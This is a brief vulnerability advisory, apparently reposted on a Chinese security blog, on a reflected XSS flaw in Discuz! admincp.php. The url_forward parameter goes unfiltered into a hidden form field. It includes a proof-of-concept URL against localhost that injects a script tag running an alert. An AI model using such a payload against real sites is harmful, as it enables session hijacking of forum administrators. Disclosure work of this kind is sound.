Discuz! admincp.php xss bug
author: 80vul-B
team:[url]http://www.80vul.com[/url]
漏洞存在于文件admin/login.inc.php里$url_forward没有被过滤导致xss漏洞:
<input type="hidden" name="url_forward" value="$url_forward">
poc:
[url]http://127.0.0.1/discuz/admincp.php?url_forward=%22%3E%3Cscript%3Ealert[/url](/xss/)%3C/script%3E
[管理员或版主前台登录,但未登录后台时触发]
Discuz! admincp.php xss bug
精选 转载simeon2005 博主文章分类:安全技术研究
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章